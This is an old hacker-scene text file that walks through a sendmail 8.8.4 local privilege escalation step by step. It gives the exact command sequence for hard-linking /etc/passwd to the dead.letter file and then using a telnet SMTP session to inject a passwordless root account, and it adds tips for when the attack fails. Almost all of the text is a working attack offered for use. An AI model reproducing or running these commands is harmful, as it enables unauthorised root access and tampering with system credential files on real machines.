sendmail8.8.4 exploit 
                           
"sendmail? 'tis the bugiest program" -phriend-

Ok, here's a brief and interesting explonation of this famous exploit. This
exploit uses sendmail version 8.8.4 and it requires that you have a shell
acount on the server in question. The exploit creates a link from
/etc/passwd to /var/tmp/dead.letter Very simple really. Here's how it
works, below are the exact commands as you have to type them (for the
technically challendged ones)

   * ln /etc/passwd /var/tmp/dead.letter
   * telnet target.host 25
   * mail from: nonexsistent@not.an.actual.host.com
   * rcpt to: nonexsistent@not.as.actual.host.com
   * data
   * lord::0:0:leet shit:/root:/bin/bash
   * .
   * quit

Kaboom, you're done, telnet to port 23 and log in as lord, no password
required. Thanx to a little bit of work we did, lord just happens to have
the same priviledges as root.

There are a couple of reasons why this might not work.

  1. /var and / are different partitions (as you already know, you can't
     make hard links between different partitions)
  2. There is a postmaster account on a machine or mail alias, in which
     case, your mail will end up there instead of being written to a
     etc/passwd
  3. /var/tmp doesn't exist or isn't publicly writable

Duncan Silver 
www.hackersclub.com/uu